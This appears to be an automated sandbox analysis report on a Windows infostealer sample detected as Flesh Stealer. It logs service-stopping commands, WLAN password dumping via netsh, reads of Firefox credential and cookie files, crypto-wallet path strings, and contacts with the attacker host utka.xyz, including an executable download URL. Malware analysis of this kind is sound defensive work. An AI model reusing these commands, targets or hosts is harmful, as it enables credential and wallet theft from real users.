Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

Source: C:\Windows\System32\dialer.exe

Code function: 19_2_00007FF744DD1C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

19_2_00007FF744DD1C64

Source: C:\Users\user\Desktop\zufmUwylvo.exe

Code function: 0_2_00000125D4017A40 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00000125D4017A40

Source: C:\Users\user\Desktop\zufmUwylvo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies power options to not sleep / hibernate

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0	Jump to behavior

Stops critical windows services

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

Stealing of Sensitive Information

Yara detected Flesh Stealer

Source: Yara match

File source: Process Memory Space: zufmUwylvo.exe PID: 4540, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BB1C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Application Data Electrum
Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAE39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Application Data Jaxx
Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAB7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet2\
Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAB7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 1C:\Users\user\AppData\Roaming\Ethereum\keystore2\
Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BB733000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Application Data ExodusWeb3
Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAB7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAB7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 5C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets2\
Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAB7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 1C:\Users\user\AppData\Roaming\Ethereum\keystore2\

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles \| findstr All
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles \| findstr All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\zufmUwylvo.exe	File opened: C:\Users\user\AppData\Local\Application Data\Mozilla\Firefox\Profiles\7tydjrzc.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\jfrd00o7.default\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\7tydjrzc.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7tydjrzc.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7tydjrzc.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\jfrd00o7.default\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7tydjrzc.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\7tydjrzc.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\jfrd00o7.default\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\7tydjrzc.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7tydjrzc.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Mozilla\Firefox\Profiles\jfrd00o7.default\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\jfrd00o7.default\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\7tydjrzc.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\jfrd00o7.default\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	File opened: C:\Users\user\AppData\Local\Application Data\Mozilla\Firefox\Profiles\jfrd00o7.default\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\7tydjrzc.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\jfrd00o7.default\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\7tydjrzc.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Mozilla\Firefox\Profiles\7tydjrzc.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\jfrd00o7.default\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7tydjrzc.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\7tydjrzc.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\zufmUwylvo.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\jfrd00o7.default\logins.json	Jump to behavior

Remote Access Functionality

Yara detected Flesh Stealer

Source: Yara match

File source: Process Memory Space: zufmUwylvo.exe PID: 4540, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	221 Windows Management Instrumentation	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	31 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	11 Windows Service	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	2 Credential API Hooking	2 File and Directory Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	Logon Script (Windows)	1 Access Token Manipulation	11 Obfuscated Files or Information	Security Account Manager	154 System Information Discovery	SMB/Windows Admin Shares	2 Credential API Hooking	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Service Execution	Login Hook	11 Windows Service	1 Timestomp	NTDS	541 Security Software Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	Network Logon Script	713 Process Injection	11 DLL Side-Loading	LSA Secrets	251 Virtualization/Sandbox Evasion	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	3 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Rootkit	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	13 Masquerading	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	251 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	713 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Hidden Files and Directories	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
zufmUwylvo.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
zufmUwylvo.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\jscseoeoqftm.tmp	100%	Avira	HEUR/AGEN.1362795
C:\Windows\Temp\jscseoeoqftm.tmp	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\jscseoeoqftm.tmp	100%	Joe Sandbox ML
C:\Program Files\Google\Chrome\updater.exe	29%	ReversingLabs
C:\Program Files\Google\Libs\WR64.sys	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\jscseoeoqftm.tmp	92%	ReversingLabs	Win64.Trojan.Heracles
C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	29%	ReversingLabs
C:\Windows\Temp\jscseoeoqftm.tmp	70%	ReversingLabs	Win64.Trojan.DisguisedXMRigMiner

Name	IP	Active	Malicious
utka.xyz	84.32.84.151	true	true
icanhazip.com	104.16.184.241	true	false
229.116.3.0.in-addr.arpa	unknown	unknown	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://icanhazip.com/	false
https://utka.xyz/1234.exe	false

URLs from Memory and Binaries

Name	Source	Malicious
https://duckduckgo.com/chrome_newtab	zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF69000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACA1000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD21000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD41000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD01000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAB49000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACC1000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmp	false
http://nuget.org/NuGet.exe	powershell.exe, 00000015.00000002.11635417801.00000216E91F9000.00000004.00000800.00020000.00000000.sdmp	false
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000015.00000002.11643116501.00000216F1798000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmp	false
https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search	zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF69000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACA1000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD21000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD41000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD01000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAB49000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACC1000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmp	false
https://duckduckgo.com/ac/?q=	zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmp	false
https://utka.xyz	zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAB21000.00000004.00000800.00020000.00000000.sdmp	false
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmp	false
https://t.me/FleshStealer	zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAE81000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BABB9000.00000004.00000800.00020000.00000000.sdmp	false
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmp	false
https://go.micro	powershell.exe, 00000015.00000002.11618898711.00000216DA5BD000.00000004.00000800.00020000.00000000.sdmp	false
http://i.pki.goog/r1.crt0	zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB544000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAEEC000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD5E000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB7DF000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CABED000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBB89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF24000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmp	false
https://contoso.com/License	powershell.exe, 00000015.00000002.11635417801.00000216E91F9000.00000004.00000800.00020000.00000000.sdmp	false
https://contoso.com/Icon	powershell.exe, 00000015.00000002.11635417801.00000216E91F9000.00000004.00000800.00020000.00000000.sdmp	false
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmp	false
http://crl.rootca1.amazontrust.com/rootca1.crl0	zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB544000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAEEC000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD5E000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB7DF000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CABED000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBB89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF24000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmp	false
https://aka.ms/winsvr-2022-pshelpXzu	powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmp	false
http://www.apache.org/licenses/LICENSE-2.0.htmlXzu	powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmp	false
http://www.microsoft.	powershell.exe, 00000015.00000002.11643879616.00000216F18FA000.00000004.00000020.00020000.00000000.sdmp	false
http://ocsp.rootca1.amazontrust.com0:	zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB544000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAEEC000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD5E000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB7DF000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CABED000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBB89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF24000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmp	false
https://www.ecosia.org/newtab/	zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF69000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACA1000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD21000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD41000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD01000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAB49000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACC1000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/Pester/Pester	powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmp	false
https://www.google.com/favicon.ico	zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmp	false
http://pesterbdd.com/images/Pester.pngXzu	powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmp	false
https://ac.ecosia.org/autocomplete?q=	zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmp	false
https://www.google.com	zufmUwylvo.exe, 00000000.00000002.11912723601.00000125D338E000.00000004.00000020.00020000.00000000.sdmp	false
https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF69000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACA1000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD21000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD41000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD01000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAB49000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACC1000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmp	false
http://x1.c.lencr.org/0	zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmp	false
http://x1.i.lencr.org/0	zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmp	false
http://c.pki.goog/r/r1.crl0	zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB544000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAEEC000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD5E000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB7DF000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CABED000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBB89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF24000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmp	false
https://contoso.com/	powershell.exe, 00000015.00000002.11635417801.00000216E91F9000.00000004.00000800.00020000.00000000.sdmp	false
https://nuget.org/nuget.exe	powershell.exe, 00000015.00000002.11635417801.00000216E91F9000.00000004.00000800.00020000.00000000.sdmp	false
